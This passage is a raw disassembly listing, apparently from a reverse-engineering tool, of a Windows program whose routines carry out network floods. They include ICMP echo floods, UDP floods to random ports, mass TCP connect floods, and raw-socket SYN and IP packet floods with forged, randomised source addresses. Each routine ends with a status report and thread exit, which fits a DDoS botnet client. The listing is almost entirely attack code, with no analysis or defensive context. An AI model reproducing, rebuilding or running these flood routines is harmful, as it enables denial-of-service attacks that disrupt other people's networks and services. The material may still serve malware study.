loc_413D8B: ; CODE XREF: sub_413A29+1C8�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset unk_4378E0
push eax
call sub_41C266
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_413DF3
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409869
add esp, 14h
loc_413DF3: ; CODE XREF: sub_413A29+3A8�j
lea eax, [ebp+var_3BC]
push eax
call sub_415D38
push [ebp+var_38]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
sub_413A29 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413E10 proc near ; DATA XREF: sub_401ACD+542D�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_41C500
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call dword_4CB95C ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_4CBA14 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_413E6B
lea eax, [ebp+var_C0]
push eax
call dword_4CBA58 ; gethostbyname
cmp eax, ebx
jz short loc_413E71
loc_413E6B: ; CODE XREF: sub_413E10+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_413ECE
loc_413E71: ; CODE XREF: sub_413E10+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_437A1C
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413EB1
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_409869
add esp, 14h
loc_413EB1: ; CODE XREF: sub_413E10+7F�j
lea eax, [ebp+var_344]
push eax
call sub_415D38
push [ebp+var_30]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
loc_413ECE: ; CODE XREF: sub_413E10+5F�j
cmp eax, ebx
jz short loc_413EDE
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_413EE1
; ---------------------------------------------------------------------------
loc_413EDE: ; CODE XREF: sub_413E10+C0�j
mov [ebp+var_4], esi
loc_413EE1: ; CODE XREF: sub_413E10+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_41BF70
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_413F01
mov [ebp+var_3C], eax
loc_413F01: ; CODE XREF: sub_413E10+EC�j
cmp [ebp+var_38], edi
jge short loc_413F09
mov [ebp+var_38], edi
loc_413F09: ; CODE XREF: sub_413E10+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_413F36
loc_413F10: ; CODE XREF: sub_413E10+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_4CB8EC ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_413F10
loc_413F36: ; CODE XREF: sub_413E10+FE�j
push [ebp+arg_0]
call dword_4CBA8C ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset unk_4379F0
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_413F7F
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_409869
add esp, 14h
loc_413F7F: ; CODE XREF: sub_413E10+14D�j
lea eax, [ebp+var_344]
push eax
call sub_415D38
push [ebp+var_30]
call sub_40B6D6
pop ecx
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_413E10 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413F9C proc near ; DATA XREF: sub_401ACD+5679�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_41C500
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
push 11h
push 2
push 2
call dword_4CBA54 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call dword_4CBA14 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_414081
lea eax, [ebp+var_B0]
push eax
call dword_4CBA58 ; gethostbyname
cmp eax, edi
jnz short loc_41407A
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset unk_437A70
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_41405D
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_409869
add esp, 14h
loc_41405D: ; CODE XREF: sub_413F9C+9F�j
lea eax, [ebp+var_334]
push eax
call sub_415D38
push [ebp+var_20]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_41407A: ; CODE XREF: sub_413F9C+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_414084
; ---------------------------------------------------------------------------
loc_414081: ; CODE XREF: sub_413F9C+6E�j
lea eax, [ebp+arg_0]
loc_414084: ; CODE XREF: sub_413F9C+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_41409F
call sub_41C2C2
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_4140A2
; ---------------------------------------------------------------------------
loc_41409F: ; CODE XREF: sub_413F9C+F0�j
push [ebp+var_24]
loc_4140A2: ; CODE XREF: sub_413F9C+101�j
call dword_4CB9D4 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_4140B4
mov [ebp+var_24], esi
loc_4140B4: ; CODE XREF: sub_413F9C+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_4140C1
mov [ebp+var_24], eax
loc_4140C1: ; CODE XREF: sub_413F9C+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_4140D5
mov [ebp+var_28], esi
loc_4140D5: ; CODE XREF: sub_413F9C+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_4140F6
loc_4140DC: ; CODE XREF: sub_413F9C+158�j
call sub_41C2C2
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_4140DC
loc_4140F6: ; CODE XREF: sub_413F9C+13E�j
; sub_413F9C+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_414155
push 0Bh
pop esi
loc_414103: ; CODE XREF: sub_413F9C+197�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_41C2C2
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call dword_4CBA38 ; sendto
push [ebp+var_28]
call ds:dword_427080 ; Sleep
dec esi
jnz short loc_414103
cmp [ebp+var_24], edi
jnz short loc_4140F6
call sub_41C2C2
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_4CB9D4 ; htons
mov [ebp+var_E], ax
jmp short loc_4140F6
; ---------------------------------------------------------------------------
loc_414155: ; CODE XREF: sub_413F9C+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset unk_437A44
push eax
call sub_41C266
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_414195
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_409869
add esp, 14h
loc_414195: ; CODE XREF: sub_413F9C+1D7�j
lea eax, [ebp+var_334]
push eax
call sub_415D38
push [ebp+var_20]
call sub_40B6D6
pop ecx
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
sub_413F9C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4141B2 proc near ; DATA XREF: sub_401ACD+4CC4�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_414313
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset dword_437A98
push eax
call sub_41C266
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414232
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409869
add esp, 14h
loc_414232: ; CODE XREF: sub_4141B2+5E�j
lea eax, [ebp+var_414]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_4141B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414251 proc near ; CODE XREF: sub_414313+27�p
var_654 = byte ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call dword_4CB9D4 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_41430F
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_41429C: ; CODE XREF: sub_414251+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_4142A4: ; CODE XREF: sub_414251+7A�j
push 0
push 1
push 2
call ds:dword_427204 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_4142C7
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_4271E0 ; ioctlsocket
loc_4142C7: ; CODE XREF: sub_414251+64�j
add esi, 4
dec ebx
jnz short loc_4142A4
lea esi, [ebp+var_654]
mov ebx, edi
loc_4142D5: ; CODE XREF: sub_414251+96�j
lea eax, [ebp+var_14]
push 10h
push eax
push dword ptr [esi]
call ds:dword_4271F8 ; connect
add esi, 4
dec ebx
jnz short loc_4142D5
push 64h
call ds:dword_427080 ; Sleep
lea esi, [ebp+var_654]
mov ebx, edi
loc_4142F9: ; CODE XREF: sub_414251+B4�j
push dword ptr [esi]
call ds:dword_427200 ; closesocket
add esi, 4
dec ebx
jnz short loc_4142F9
dec [ebp+arg_4]
jnz short loc_41429C
pop edi
pop esi
pop ebx
loc_41430F: ; CODE XREF: sub_414251+3E�j
xor eax, eax
leave
retn
sub_414251 endp
; =============== S U B R O U T I N E =======================================
sub_414313 proc near ; CODE XREF: sub_4141B2+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40A8F0
push [esp+10h+arg_4]
mov edi, eax
call sub_41C159
push [esp+14h+arg_8]
mov ebx, eax
call sub_41C159
mov esi, eax
push esi
push ebx
push edi
call sub_414251
add esp, 18h
test eax, eax
jnz short loc_414349
push 1
pop eax
loc_414349: ; CODE XREF: sub_414313+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_414313 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414358 proc near ; DATA XREF: sub_401ACD+636B�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_4146A9
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset unk_437AC4
push eax
call sub_41C266
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4143D8
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_409869
add esp, 14h
loc_4143D8: ; CODE XREF: sub_414358+5E�j
lea eax, [ebp+var_414]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_414358 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4143F7 proc near ; CODE XREF: sub_4146A9+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4CB944 ; WSAStartup
test eax, eax
jz short loc_414437
xor eax, eax
jmp loc_4146A5
; ---------------------------------------------------------------------------
loc_414437: ; CODE XREF: sub_4143F7+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4CBA78 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_41469D
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_4CB9B4 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_414693
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_41BF70
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call dword_4CB9D4 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_4CB9D4 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_4CB9D4 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_4CB9D4 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_42713C ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_427138 ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_41DB20
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_414522: ; CODE XREF: sub_4143F7+25D�j
; sub_4143F7+26B�j
mov [ebp+var_24], bx
call sub_41C2C2
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4CB9D4 ; htons
mov [ebp+var_34], ax
call sub_41C2C2
mov edi, eax
shl edi, 10h
call sub_41C2C2
or edi, eax
push edi
call dword_4CB9D4 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4CB9D0 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4CB9D4 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41CD20
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_41CD20
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AA5F
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41CD20
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41CD20
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_41BF70
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AA5F
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41CD20
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_4CBA38 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_414667
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_427138 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_414690
jl loc_414522
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_414690
jmp loc_414522
; ---------------------------------------------------------------------------
loc_414667: ; CODE XREF: sub_4143F7+247�j
call dword_4CB968 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset unk_437AEC
push eax
call sub_41C266
lea eax, [ebp+var_F4]
push eax
call sub_415D38
add esp, 10h
jmp short loc_414693
; ---------------------------------------------------------------------------
loc_414690: ; CODE XREF: sub_4143F7+25B�j
; sub_4143F7+269�j
mov ebx, [ebp+arg_8]
loc_414693: ; CODE XREF: sub_4143F7+78�j
; sub_4143F7+297�j
push [ebp+var_C]
call dword_4CBA6C ; closesocket
pop esi
loc_41469D: ; CODE XREF: sub_4143F7+5B�j
call dword_4CB92C ; WSACleanup
mov eax, ebx
loc_4146A5: ; CODE XREF: sub_4143F7+3B�j
pop edi
pop ebx
leave
retn
sub_4143F7 endp
; =============== S U B R O U T I N E =======================================
sub_4146A9 proc near ; CODE XREF: sub_414358+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40A8F0
push [esp+10h+arg_4]
mov esi, eax
call sub_41C159
push [esp+14h+arg_8]
mov ebx, eax
call sub_41C159
mov edi, eax
call sub_41C2C2
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4143F7
add esp, 1Ch
test eax, eax
jnz short loc_4146F4
push 1
pop eax
loc_4146F4: ; CODE XREF: sub_4146A9+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4146A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414703 proc near ; DATA XREF: sub_401ACD+6D3D�o
var_394 = byte ptr -394h
var_194 = dword ptr -194h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 394h
mov eax, [ebp+arg_0]
push esi
push edi
push 65h
pop ecx
mov esi, eax
lea edi, [ebp+var_194]
rep movsd
mov dword ptr [eax+190h], 1
lea eax, [ebp+var_110]
push eax
call sub_41C159
pop ecx
push eax
lea eax, [ebp+var_190]
push eax
call dword_4CBA14 ; inet_addr
push eax
call sub_4147A6
pop ecx
pop ecx
push eax
lea eax, [ebp+var_394]
push offset dword_437B0C
push eax
call sub_41C266
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_414787
push esi
lea eax, [ebp+var_394]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_194]
call sub_409869
add esp, 14h
loc_414787: ; CODE XREF: sub_414703+62�j
lea eax, [ebp+var_394]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_414703 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4147A6 proc near ; CODE XREF: sub_414703+41�p
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
push 1
pop ecx
and [ebp+var_88], 0
push 4
and [ebp+var_58], 0
pop esi
mov ebx, 0FFh
push 6
xor eax, eax
pop edx
lea edi, [ebp+var_54]
mov [ebp+var_84], ecx
mov [ebp+var_80], 2
mov [ebp+var_7C], esi
mov [ebp+var_78], edx
mov [ebp+var_74], 8
mov [ebp+var_70], 0Ch
mov [ebp+var_6C], 11h
mov [ebp+var_68], 16h
mov [ebp+var_64], 29h
mov [ebp+var_60], 3Ah
mov [ebp+var_5C], ebx
mov [ebp+var_50], eax
stosd
lea edi, [ebp+var_2C]
mov [ebp+var_4C], eax
mov [ebp+var_48], eax
mov [ebp+var_44], 2000h
mov [ebp+var_40], esi
mov [ebp+var_3C], edx
mov [ebp+var_38], 3FFFh
mov [ebp+var_34], ecx
mov [ebp+var_30], eax
mov [ebp+var_28], ecx
stosd
mov edi, 100h
push edi
call sub_41D9A5
pop ecx
mov [ebp+var_4], eax
push edi
push eax
call dword_4CB9E8 ; gethostname
push [ebp+var_4]
call dword_4CBA58 ; gethostbyname
mov eax, [eax+0Ch]
push ebx
push 3
push 2
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_C], eax
call dword_4CBA54 ; socket
lea ecx, [ebp+var_28]
push esi
push ecx
push 2
push 0
push eax
mov [ebp+var_4], eax
call dword_4CB9B4 ; setsockopt
mov esi, 200h
push esi
call sub_41BEB5
mov edi, ds:dword_4270B0
pop ecx
mov [ebp+var_8], eax
call edi ; GetTickCount
mov [ebp+var_10], eax
mov eax, [ebp+arg_0]
push 29Ah
mov [ebp+var_94], eax
mov [ebp+var_98], 2
call dword_4CB9D4 ; htons
mov [ebp+var_96], ax
loc_4148C1: ; CODE XREF: sub_4147A6+1FC�j
call edi ; GetTickCount
sub eax, [ebp+var_10]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+arg_4]
ja loc_4149A7
call sub_41C2C2
cdq
mov ecx, ebx
idiv ecx
mov eax, [ebp+var_C]
and eax, 0FFFFFFh
shl edx, 18h
or edx, eax
mov [ebp+var_C], edx
call sub_41C2C2
cdq
mov ecx, ebx
idiv ecx
mov [ebp+var_54], edx
call sub_41C2C2
cdq
mov ecx, 1FA4h
mov [ebp+var_24], 45h
idiv ecx
mov [ebp+var_23], 4
mov [ebp+var_2C], edx
call sub_41C2C2
mov [ebp+var_20], ax
call sub_41C2C2
push 0Ah
cdq
pop ecx
idiv ecx
mov ax, word ptr [ebp+edx*4+var_50]
push eax
call dword_4CB9D4 ; htons
push esi
mov [ebp+var_1E], ax
call dword_4CB9D4 ; htons
mov [ebp+var_22], ax
mov [ebp+var_1C], bl
call sub_41C2C2
push 0Eh
cdq
pop ecx
idiv ecx
push 14h
mov al, byte ptr [ebp+edx*4+var_88]
mov [ebp+var_1B], al
mov eax, [ebp+var_C]
mov [ebp+var_18], eax
mov eax, [ebp+arg_0]
mov [ebp+var_14], eax
lea eax, [ebp+var_24]
push eax
call sub_40AA5F
mov [ebp+var_1A], ax
lea eax, [ebp+var_24]
push 14h
push eax
push [ebp+var_8]
call sub_41CD20
add esp, 14h
lea eax, [ebp+var_98]
push 10h
push eax
push 0
push esi
push [ebp+var_8]
push [ebp+var_4]
call dword_4CBA38 ; sendto
jmp loc_4148C1
; ---------------------------------------------------------------------------
loc_4149A7: ; CODE XREF: sub_4147A6+12C�j
push [ebp+var_8]
call sub_41BA91
pop ecx
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push 1
pop eax
pop edi
pop esi
pop ebx
leave
retn
sub_4147A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4149C1 proc near ; DATA XREF: sub_401ACD+5306�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
